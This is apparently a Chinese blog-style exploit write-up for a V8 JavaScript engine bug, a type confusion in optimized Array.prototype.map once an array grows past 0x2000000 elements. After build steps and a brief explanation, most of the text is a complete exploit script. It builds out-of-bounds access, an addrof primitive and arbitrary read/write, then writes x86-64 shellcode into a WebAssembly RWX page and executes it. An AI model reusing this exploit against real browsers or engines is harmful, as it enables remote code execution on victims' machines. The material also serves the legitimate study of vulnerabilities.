git checkout d7cd9051ad9b53f72c32cd27493470b0801eb545
gclient sync -f
./tools/dev/gm.py x64.release
思路
和cve-2018-17463类似,当数组的size大于0x2000000时就会从FixedArray变为NamedDictionary,当优化之后jit依然当该数组是FixedArray类型,因为FixedArray是连续我们用NamedDictionary方式访问的话肯定会访问到不同偏移的地方,这时候就创造了类似于数组越界的一个东西,然后就用常规思路创建一个length很大的数组,然后找到rwx_addr写shellcode,然后运行即可
exp
var buf = new ArrayBuffer(0x8);
var dv = new DataView(buf);
function i2f(value) {
dv.setBigUint64(0,BigInt(value),true);
return dv.getFloat64(0,true);
}
function f2i(value) {
dv.setFloat64(0,value,true);
return dv.getBigUint64(0,true);
}
function i2f32(value) {
dv.setUint32(0,value,true);
return dv.getFloat32(0,true);
}
function f2i32(value) {
dv.setFloat32(0,value,true);
return dv.getBigUint32(0,true);
}
function hex(addr){
return "0x" + addr.toString(16);
}
function wasm_func() {
var wasmImports = {
env: {
puts: function puts (index) {
print(utf8ToString(h, index));
}
}
};
var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,137,128,128,128,0,2,
96,1,127,1,127,96,0,0,2,140,128,128,128,0,1,3,101,110,118,4,112,117,
116,115,0,0,3,130,128,128,128,0,1,1,4,132,128,128,128,0,1,112,0,0,5,
131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,
109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,1,10,141,128,128,
128,0,1,135,128,128,128,0,0,65,16,16,0,26,11,11,146,128,128,128,0,1,0,
65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let m = new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports);
let h = new Uint8Array(m.exports.memory.buffer);
return m.exports.hello;
}
func = wasm_func();
var wasmObjAddr;
var a1, a2,a3,a4,floatArray,obj,objArray,objBuf,objView,tmp_low,tmp_high,addr_high,addr_low;
Array(2**30);
var a = [1,2,,3];
function mapping(arr) {
return arr.map((content,idx)=>{
if(idx == 0){
a1 = [1.1,2.2,3.3];
}else if(a1.length != 3){
print(idx);
throw "e";
}
return content;
});
}
for(let i = 0; i < 0x10000; i ++) mapping(a);
a.length = 0x2000000;
a.fill(0x1234,0x18);
a.length += 0x100;
try{
mapping(a);
}catch(e){
print(hex(a1.length));
/*function read_dataview(addr){
}*/
}
a3 = a1;
objBuf = new ArrayBuffer(0x200);
objView = new DataView(objBuf);
a4 = new BigUint64Array(4);
a4[0] = 0x1122334455667788n;
a4[1] = 0xaabbaabbccddccddn;
a4[2] = 0xdeadbeefdeadbeefn;
a4[3] = 0xeeeeeeeeffffffffn;
obj = {aaaa:"bbbb"};
objArray = [obj];
objArray[0] = func;
for(let i = 0;i<100;i++) print(i + ":" + hex(f2i(a3[i])));
wasmObjAddr = f2i(a3[84]) - 0x1n;
console.log("wasm object addr: "+hex(wasmObjAddr));
function addrof(addr){
objArray[0] = i2f(addr);
return f2i(a3[84]) - 0x1n;
}
function read_dataview(addr){
a3[35n] = i2f(addr);
return f2i(objView.getFloat64(0,true));
}
function write_dataview(addr,payload){
a3[35n] = i2f(addr);
for(var i = 0;i < payload.length;i++){
objView.setUint8(i,payload[i],true);
}
}
var rwx_addr = read_dataview(wasmObjAddr-0xf8n);
console.log("rwx_addr: "+hex(rwx_addr));
var shellcode = [72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 121, 98,
96, 109, 98, 1, 1, 72, 49, 4, 36, 72, 184, 47, 117, 115, 114, 47, 98,
105, 110, 80, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1,
72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90,
72, 1, 226, 82, 72, 137, 226, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72,
184, 121, 98, 96, 109, 98, 1, 1, 1, 72, 49, 4, 36, 49, 246, 86, 106, 8,
94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5];
write_dataview(rwx_addr, shellcode);
func();
image
网友评论